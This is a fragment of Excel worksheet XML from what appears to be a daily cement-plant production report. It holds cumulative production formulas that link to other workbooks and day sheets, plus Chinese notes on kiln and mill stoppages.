        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'28'!K60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'[14]29'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]29'!$E$6</f>
        <v>3749</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'28'!H61</f>
        <v>112712</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1228585</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]29'!$E$21</f>
        <v>3854.61</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'28'!K61</f>
        <v>114859.35</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1216019.43</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]29'!$H$6</f>
        <v>35621.8199999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>68.5034999999998</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'[14]29'!$M$11+'[14]29'!$M$12+'[14]29'!$M$13+'[14]29'!$M$14+'[14]29'!$M$15+'[14]29'!$M$16+'[14]29'!$M$17+'[14]29'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]29'!$N$11+'[14]29'!$N$12+'[14]29'!$N$13+'[14]29'!$N$14+'[14]29'!$N$15+'[14]29'!$N$16+'[14]29'!$N$17+'[14]29'!$N$18</f>
        <v>670</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'28'!H62</f>
        <v>76581</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>912574.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]29'!$Q$11+'[14]29'!$Q$12+'[14]29'!$Q$13+'[14]29'!$Q$14+'[14]29'!$Q$15+'[14]29'!$Q$16+'[14]29'!$Q$17+'[14]29'!$Q$18</f>
        <v>2701</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'28'!K62</f>
        <v>81154</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>915626.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]29'!$T$11+'[14]29'!$T$12+'[14]29'!$T$13+'[14]29'!$T$14+'[14]29'!$T$15+'[14]29'!$T$16+'[14]29'!$T$17+'[14]29'!$T$18</f>
        <v>13881.6339999999</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>55.5265359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]29'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]29'!$M$19+'[14]29'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]29'!$N$19+'[14]29'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'28'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]29'!$Q$19+'[14]29'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'28'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]29'!$T$19+'[14]29'!$T$20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G64+'28'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'28'!K64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G65+'28'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'28'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]29'!$Q$74</f>
        <v>1#窑:续停；2#窑:正常；1#磨:14:30-22:20避峰停机。2#磨:4:30-24:00库满停机。3#磨:8:30-22:25避峰停机。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G66+'28'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'28'!K66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G67+'28'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'28'!K67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'[15]29'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]29'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'28'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]29'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'28'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]29'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]29'!$Q$77</f>
        <v>1#磨运行正常。2#磨8:00-21:30避峰停机:13.5小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]29'!$D$43+'[15]29'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]29'!$E$43+'[15]29'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'28'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]29'!$H$43+'[15]29'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'28'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]29'!$K$43+'[15]29'!$K$44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'[15]29'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]29'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'28'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]29'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'28'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]29'!$K$45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G71+'28'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'28'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]27'!$Q$80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G72+'28'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'28'!K72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G73+'28'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'28'!K73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G74+'28'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'28'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]29'!$Q$83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G75+'28'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'28'!K75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G76+'28'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'28'!K76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G77+'28'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'28'!K77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G78+'28'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'28'!K78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'[16]29'!$E$7</f>
        <v>560.34</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'28'!H79</f>
        <v>15631.1</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>162759.57</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]29'!$I$7</f>
        <v>532.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'28'!K79</f>
        <v>14253</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>156144.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]29'!$L$7</f>
        <v>6262.88</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>12.52576</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'[16]29'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'28'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]29'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'28'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]29'!$Y$15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G81+'28'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'28'!K81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G82+'28'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'28'!K82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G83+'28'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'28'!K83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G84+'28'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'28'!K84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G85+'28'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'28'!K85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B62:C63"/>
    <mergeCell ref="B80:C81"/>
    <mergeCell ref="P77:Z85"/>
    <mergeCell ref="Q68:Z70"/>
    <mergeCell ref="Q59:Z61"/>
    <mergeCell ref="Q62:Z64"/>
    <mergeCell ref="Q65:Z67"/>
    <mergeCell ref="Q56:Z58"/>
    <mergeCell ref="O3:Q4"/>
    <mergeCell ref="Q71:Z73"/>
    <mergeCell ref="B69:C70"/>
    <mergeCell ref="Q74:Z76"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.2" right="0.2" top="0.2" bottom="0.2" header="0" footer="0"/>
  <pageSetup paperSize="9" scale="55" orientation="portrait"/>
  <headerFooter alignWithMargins="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58"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="H5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A1" sqref="$A1:$XFD1048576"/>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30/31</f>
        <v>0.967741935483871</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46021</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23670.87</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'29'!H5</f>
        <v>633159.78</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6788025.81</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>23612.128</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'29'!K5</f>
        <v>694108.552</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6844179.683</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>206519.052</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>55.2189978609625</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]30'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]30'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]30'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]30'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]30'!$U$101</f>
        <v>32.07875</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]30'!$V$101</f>
        <v>61.976717032967</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]30'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]30'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]30'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]30'!$D$23+'[11]30'!$D$17+'[12]30'!$D$17+'[13]30'!$D$25+'[14]30'!$D$8+'[14]30'!$D$15+'[15]30'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]30'!$E$23+'[11]30'!$E$17+'[12]30'!$E$17+'[13]30'!$E$25+'[14]30'!$E$8+'[14]30'!$E$15+'[15]30'!$E$7</f>
        <v>1322</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'29'!H6</f>
        <v>11023</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>287372.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]30'!$I$23+'[11]30'!$I$17+'[12]30'!$I$17+'[13]30'!$I$25+'[14]30'!$E$23+'[14]30'!$E$30+'[15]30'!$H$7</f>
        <v>947.910000000001</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'29'!K6</f>
        <v>22524.53</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>284722.23</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]30'!$L$23+'[11]30'!$L$17+'[12]30'!$L$17+'[13]30'!$L$25+'[14]30'!$H$23+'[14]30'!$H$30+'[15]30'!$K$7</f>
        <v>20611.31</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]30'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]30'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]30'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]30'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]30'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]30'!$V$102</f>
        <v>32.5686698717949</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]30'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]30'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]30'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]30'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]30'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'29'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]30'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'29'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]30'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]30'!$W$107</f>
        <v>109.5</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]30'!$X$107</f>
        <v>125.802720134605</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]30'!$Y$107</f>
        <v>131.300280433535</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]30'!$T$107</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]30'!$U$107</f>
        <v>39.6222222222222</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]30'!$V$107</f>
        <v>31.7160027472527</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]30'!$Q$107</f>
        <v>8</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]30'!$R$107</f>
        <v>285.28</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]30'!$S$107</f>
        <v>2770.71</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]30'!$D$27+'[11]30'!$D$18+'[13]30'!$D$26+'[14]30'!$D$10+'[14]30'!$D$17+'[15]30'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]30'!$E$27+'[11]30'!$E$18+'[13]30'!$E$26+'[14]30'!$E$10+'[14]30'!$E$17+'[15]30'!$E$9</f>
        <v>4297</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'29'!H8</f>
        <v>69205</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>594741.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]30'!$I$27+'[11]30'!$I$18+'[13]30'!$I$26+'[14]30'!$E$25+'[14]30'!$E$32+'[15]30'!$H$9</f>
        <v>2851.86</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'29'!K8</f>
        <v>77163.68</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>584908.39</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]30'!$L$27+'[11]30'!$L$18+'[13]30'!$L$26+'[14]30'!$H$25+'[14]30'!$H$32+'[15]30'!$K$9</f>
        <v>33921.22</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]30'!$W$108</f>
        <v>93.5569285083848</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]30'!$X$108</f>
        <v>131.074916572268</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]30'!$Y$108</f>
        <v>127.896793317165</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]30'!$T$108</f>
        <v>47.2083333333333</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]30'!$U$108</f>
        <v>45.3652777777778</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]30'!$V$108</f>
        <v>28.885989010989</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]30'!$Q$108</f>
        <v>11.33</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]30'!$R$108</f>
        <v>326.63</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]30'!$S$108</f>
        <v>2523.48</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]30'!$D$24+'[11]30'!$D$19+'[12]30'!$D$20+'[13]30'!$D$27+'[14]30'!$D$11+'[14]30'!$D$18+'[15]30'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]30'!$E$24+'[11]30'!$E$19+'[12]30'!$E$20+'[13]30'!$E$27+'[14]30'!$E$11+'[14]30'!$E$18+'[15]30'!$E$10</f>
        <v>15328.19</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'29'!H9</f>
        <v>450071.19</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4585460.07</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]30'!$I$24+'[11]30'!$I$19+'[12]30'!$I$20+'[13]30'!$I$27+'[14]30'!$E$26+'[14]30'!$E$33+'[15]30'!$H$10</f>
        <v>15856.088</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'29'!K9</f>
        <v>468799.282</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4566278.093</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]30'!$L$24+'[11]30'!$L$19+'[12]30'!$L$20+'[13]30'!$L$27+'[14]30'!$H$26+'[14]30'!$H$33+'[15]30'!$K$10</f>
        <v>92137.62</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]30'!$W$109</f>
        <v>239.25</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]30'!$X$109</f>
        <v>262.965354809299</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]30'!$Y$109</f>
        <v>270.594639126725</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]30'!$T$109</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]30'!$U$109</f>
        <v>36.5611111111111</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]30'!$V$109</f>
        <v>35.0140796703296</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]30'!$Q$109</f>
        <v>8</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]30'!$R$109</f>
        <v>263.24</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]30'!$S$109</f>
        <v>3058.82999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]30'!$D$25+'[11]30'!$D$20+'[12]30'!$D$21+'[13]30'!$D$28+'[14]30'!$D$12+'[14]30'!$D$19+'[15]30'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]30'!$E$25+'[11]30'!$E$20+'[12]30'!$E$21+'[13]30'!$E$28+'[14]30'!$E$12+'[14]30'!$E$19+'[15]30'!$E$11</f>
        <v>2177</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'29'!H10</f>
        <v>64579</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>982106.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]30'!$I$25+'[11]30'!$I$20+'[12]30'!$I$21+'[13]30'!$I$28+'[14]30'!$E$27+'[14]30'!$E$34+'[15]30'!$H$11</f>
        <v>2648.28</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'29'!K10</f>
        <v>85727.12</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>982955.84</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]30'!$L$25+'[11]30'!$L$20+'[12]30'!$L$21+'[13]30'!$L$28+'[14]30'!$H$27+'[14]30'!$H$34+'[15]30'!$K$11</f>
        <v>40058.822</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]30'!$W$110</f>
        <v>165.25</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]30'!$X$110</f>
        <v>243.93649579189</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]30'!$Y$110</f>
        <v>266.698287202608</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]30'!$T$110</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]30'!$U$110</f>
        <v>36.3055555555556</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]30'!$V$110</f>
        <v>34.632097069597</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]30'!$Q$110</f>
        <v>8</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]30'!$R$110</f>
        <v>261.4</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]30'!$S$110</f>
        <v>3025.46</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]30'!$D$26+'[11]30'!$D$21+'[12]30'!$D$19+'[13]30'!$D$29+'[14]30'!$D$13+'[14]30'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]30'!$E$26+'[11]30'!$E$21+'[12]30'!$E$19+'[13]30'!$E$29+'[14]30'!$E$13+'[14]30'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'29'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
